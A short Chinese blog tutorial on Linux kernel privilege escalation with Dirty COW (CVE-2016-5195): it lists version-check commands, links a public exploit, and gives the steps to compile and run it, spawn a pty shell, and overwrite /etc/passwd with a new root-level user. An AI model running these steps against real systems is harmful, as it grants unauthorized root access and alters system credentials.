美文网首页
linux内核提权(脏牛CVE-2016-5195)

linux内核提权(脏牛CVE-2016-5195)

作者: migrate_ | 来源:发表于2020-04-24 17:04 被阅读0次
    • 漏洞范围:
      Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)
    • 查看版本信息
    uname -a
    uname -r
    cat /etc/issue
    cat /etc/*-release
    
    1.jpg
    • 在脏牛的影响范围内,直接上传脚本
    https://github.com/FireFart/dirtycow
    
    • 给脚本执行权限
    chmod 777 dirty.c
    
    • 编译脚本
    #利用gcc编译dirty.c文件
    gcc -pthread dirty.c -o dirty -lcrypt
    
    2.jpg
    • 切换交互式shell
     python -c 'import pty;pty.spawn("/bin/sh")'
    
    • 执行脚本
    ./dirty 123456  //(密码)
    
    3.jpg 4.jpg
    • /etc/passwd 文件已经更改
    firefart:123456  //用户名:密码
    //利用之前最后做个备份  /etc/passwd
    

    相关文章

      网友评论

          本文标题:linux内核提权(脏牛CVE-2016-5195)

          本文链接:https://www.haomeiwen.com/subject/ijbfwhtx.html